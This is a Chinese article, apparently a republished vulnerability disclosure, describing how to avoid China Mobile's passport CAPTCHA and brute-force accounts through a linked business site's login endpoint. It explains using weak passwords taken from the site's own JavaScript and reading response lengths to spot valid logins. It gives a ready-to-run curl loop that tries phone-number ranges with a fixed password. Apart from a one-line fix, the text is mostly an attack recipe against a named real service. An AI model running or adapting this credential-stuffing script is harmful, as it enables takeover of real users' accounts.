今天看啥
热点:

绕过变态图验对中国移动互联网通行证暴力破解撞库


移动互联网通行证可登录多个业务系统,是统一认证账户。通行证主站图验直接破解有难度,可从业务站进行破解。最近新上了好几个新业务,看看是否由此入手,从而可以暴力破解互联网通行证账号.于是在这些新开的业务中找到几处可用于撞库的地方

先从互联网通行证管理主站cmpassport.com提取可用的弱口令。从下面贴图中可以看出,检验弱口令在本地js中,直接用js检查流行的top500,找出适用的弱口令用作字典
 

25.png



然后用这个弱口令,在此处批量登录

http://www.wxcs.cn

21.png





返回包长253,即登录成功
 

23.png



这个是密码错误



其它的为账户未开通

还是用脚本验证
 

22.png





脚本内容为(curl需要支持ssl,可http://curl.haxx.se/download.html处下载)

for /L %x in (6000,1,9999) do curl -k -x 127.0.0.1:8888 -A "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; Tablet PC 2.0)" -b "BROWSER_TAG=80C217168217F634C68E37FE262F852D1426644913763; WXCS_PORTAL_AREA=120000; backUrl="aHR0cDovL3RpYW5qaW4ud3hjcy5jbg=="; JSESSIONID=80C217168217F634C68E37FE262F852D; WXCS_PORTAL_TPL=win8; WXCS_PORTAL_LAST_AREA=120000" -H "X-Requested-With: XMLHttpRequest" -d "loginID=要解的手机号前几位%x&m1m=弱口令&backUrl=aHR0cDovL3RpYW5qaW4ud3hjcy5jbg%3D%3D&fromReq=" -e "https://ac.wxcs.cn/user/toLogin?backUrl=aHR0cDovL3RpYW5qaW4ud3hjcy5jbg==" "https://ac.wxcs.cn/user/loginPost" -w 5

解决方案:

图验防护

www.bkjia.comtruehttp://www.bkjia.com/wzaq/985826.htmlTechArticle绕过变态图验对中国移动互联网通行证暴力破解撞库 移动互联网通行证可登录多个业务系统,是统一认证账户。通行证主站图验直接破解有...

相关文章

相关搜索: 中国移动 暴力 变态

帮客评论

视觉看点